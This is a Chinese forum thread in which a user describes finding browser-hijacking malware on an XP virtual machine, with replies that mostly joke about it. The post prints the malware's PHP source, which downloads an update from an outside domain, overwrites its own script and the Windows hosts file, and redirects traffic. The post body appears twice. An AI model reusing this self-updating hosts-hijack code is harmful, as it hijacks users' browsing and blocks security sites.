这是一个创建于 3993 天前的主题,其中的信息可能已经有所发展或是发生改变。
本人有个xp虚拟机,上面没装杀毒软件。有一次不知安装了什么,桌面上总是会自动创建某网站的快捷方式,然后看进程把几个exe删掉就好了。
看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。
贴index.php给大家看看(还自带注释的-_-||):
<?php
include_once "config.php";
$name1 = "www.2345.com,2345.com";
$name2 = "www.tao123.com,tao123.com";
//$name3 = "www.hao123.com,hao123.com";
//获取最新php
$index = file_get_contents('http://www.129129.com/ht/index.txt');
if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);
$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}
//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化
$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.129129.com/?3");exit;
break;
default:
header("Location:http://www.129129.com/?4");exit;
break;
}
?>
<meta http-equiv="refresh" content="0;url=http://www.129129.com/?301">
config.php:
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>
看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。
贴index.php给大家看看(还自带注释的-_-||):
<?php
include_once "config.php";
$name1 = "www.2345.com,2345.com";
$name2 = "www.tao123.com,tao123.com";
//$name3 = "www.hao123.com,hao123.com";
//获取最新php
$index = file_get_contents('http://www.129129.com/ht/index.txt');
if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);
$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}
//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化
$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.129129.com/?3");exit;
break;
default:
header("Location:http://www.129129.com/?4");exit;
break;
}
?>
<meta http-equiv="refresh" content="0;url=http://www.129129.com/?301">
config.php:
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>
 |
1
shierji 2013-11-25 21:46:58 +08:00
原版才是正道啊……- -
|
 |
2
imsuwj 2013-11-25 22:11:35 +08:00
很有想法。。。
|
 |
3
soulgain 2013-11-25 22:20:40 +08:00
这恶意的方式好搞笑啊~~
|
 |
4
AstroProfundis 2013-11-25 22:22:59 +08:00  1
莫名喜感是为啥...
|
 |
5
zts1993 2013-11-25 22:23:23 +08:00 2
php程序员也可以写病毒啦,。。。。233333
|
 |
6
likuku 2013-11-25 22:28:55 +08:00
虚拟机装好XP就立即安装MS官方的 security-essentials
|
 |
7
pirex 2013-11-25 22:30:50 +08:00 1
好喜感。。
|
 |
8
lizheming 2013-11-25 22:48:57 +08:00 via iPad
我想说这样能被杀毒软件检测出来么。感觉都是正常步骤额
|
 |
9
Mutoo 2013-11-25 22:51:42 +08:00
Domain Name : 129129.com
Registrar: eName Technology Co.,Ltd. 注册人联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 管理人联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 技术联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 财务联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 状态: clientDeleteProhibited clientTransferProhibited DNS服务器 : F1G1NS1.DNSPOD.NET F1G1NS2.DNSPOD.NET 创建时间 : 2010-10-27 18:50:02 过期时间 : 2015-10-27 18:50:02 ===== 居然是厦门的,丢人啊。 |
 |
10
kutata 2013-11-25 23:06:17 +08:00
因为这样写杀毒软件不杀?-_-||
|
 |
11
DearMark 2013-11-25 23:14:30 +08:00
觉历,这个Apache装得秒,你还可以用一下。
|
 |
12
sophy 2013-11-25 23:26:07 +08:00
确实啊,这样应该能躲过杀毒软件
|
 |
14
plprapper 2013-11-25 23:49:57 +08:00 1
想当年 学校里上 lamp课程的时候 很多同学搞不定环境安装 各种报错。。。。
哈哈 把这个东西发给学校老师把, 一键搞定。 |
 |
15
raincious 2013-11-25 23:58:33 +08:00 via Android
好奇为什么不用nodejs写,又轻又小,再不济用php自己的服务器啊。
要是再把mysql装上就搞了。 |
 |
16
yfdyh000 2013-11-26 00:01:21 +08:00
网页直接嵌入了 http://www.qq.net/129129_2.html ,页面修改自114la,很多都没改。
粤ICP备05021225号-5。这是雨林木风的?…… |
 |
17
lhx2008 2013-11-26 06:59:07 +08:00
跳转的方法蛋疼,一眼就知道被劫持了把,而且改hosts不能过杀软
|
 |
18
jianghu52 2013-11-26 07:57:29 +08:00
话说命名还挺规范的啊。
|
 |
19
qonco 2013-11-26 09:14:25 +08:00
//域名跳转个性化
噗~ |
 |
20
wheatcuican 2013-11-26 09:53:51 +08:00 1
居然装apache,噗~
|
|
21
wheatcuican 2013-11-26 09:54:30 +08:00
还自带注释,噗~
|
 |
22
xiaket 2013-11-26 10:15:30 +08:00
真有创意...
|
 |
23
sun019 2013-11-26 10:19:58 +08:00 1
创意啊 不错 收藏了
|
 |
24
meta 2013-11-26 10:21:22 +08:00
这得多大一个体积的病毒啊。
|
 |
25
wingoo 2013-11-26 10:48:10 +08:00
关键是杀毒软件不杀..
|
 |
26
justfindu 2013-11-26 11:14:47 +08:00
还写注释~ 这习惯真好啊
|
 |
27
tuzi 2013-11-26 11:23:14 +08:00
这思路绝了,可惜没用在正路上!
|
 |
28
Legend 2013-11-26 11:31:07 +08:00
|
 |
29
refresh 2013-11-26 12:23:09 +08:00
难道杀毒软件不管个性hosts么,hosts需要权限吧
|
 |
30
summic 2013-11-26 12:30:11 +08:00
思路牛逼,估计那家伙很快就会用几十k的webserver换掉apache和php
|
 |
31
kfll 2013-11-26 12:40:53 +08:00 via iPhone
还好只是跳转……要是直接在本地搭钓鱼站……还能随时更新……简直……
|
 |
32
josephok 2013-11-26 14:22:57 +08:00
XD
|
 |
33
lucker6666 2013-11-26 14:29:34 +08:00
@kfll 这思路 nb了
|
 |
34
erse 2013-11-26 14:38:30 +08:00
牛逼的思路,这可以算是流量么?
|
 |
35
kran 2013-11-26 14:57:33 +08:00
能把apache装上那简直是不容易了,手动安装我都嫌烦。。
|
 |
36
zjgsamuel 2013-11-26 16:21:54 +08:00
这肉鸡使的 学习了!!
|
 |
37
tywtyw2002 2013-11-26 17:37:47 +08:00
我还见过一个木马呢,把某个webhosting的母鸡给入侵了。
自己编译了一个新的nginx,在这个nginx里面加入了功能,随机把网页302倒色情广告联盟,然后加上cookie,这样用户第二次访问就不会跳转了。。。。。 然后把老的nginx文件给替换成一个sh脚本。。。。 |
 |
38
aivier 2013-11-26 17:42:01 +08:00
好吧,无敌了,竟然还可以这样写恶意软件。。。!
|
 |
39
chengzi 2013-11-26 21:06:17 +08:00 1
注释好习惯
|
 |
40
codegear 2013-11-26 23:23:37 +08:00 via Android
莫名的喜感啊!
|
 |
41
laobubu 2013-11-26 23:58:03 +08:00 via Android
求病毒,一键部署apache啊!!
|
 |
42
iqincai 2013-11-27 10:01:41 +08:00 via Android
好有喜感啊-.-
|
 |
43
tioover 2013-11-27 19:41:47 +08:00
23333
|
 |
44
Quaintjade 2013-11-27 20:37:31 +08:00
以前有笑话说用C#写个病毒还要先帮用户下载安装合适版本的.NET Framework,没想到还真有写个php病毒先帮用户安装apache和php的……
|
 |
45
chens 2013-11-28 09:38:05 +08:00
思路挺牛x
|
 |
46
yanwen 2013-12-16 12:06:58 +08:00
@tywtyw2002 好牛逼。。
|
Select Language